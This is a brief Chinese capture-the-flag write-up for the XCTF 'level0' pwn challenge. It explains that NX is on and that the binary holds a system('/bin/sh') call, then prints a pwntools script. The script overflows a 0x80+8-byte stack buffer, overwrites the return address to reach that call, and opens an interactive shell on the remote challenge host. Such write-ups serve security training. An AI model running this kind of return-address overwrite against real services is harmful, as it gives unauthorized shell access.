[攻防世界 pwn]——level0
- 题目地址: https://adworld.xctf.org.cn/
- 题目:
checksec看下保护类型,开启了NX保护
IDA中看下,发现了system("/bin/sh")函数,返回地址修改为该函数就可以
exploit
from pwn import *
#p = process("./pwn")
p = remote("111.200.241.244",40322)
sys_addr = 0x0400596
payload = 'a'*(0x80+8) + p64(sys_addr)
p.sendline(payload)
p.interactive()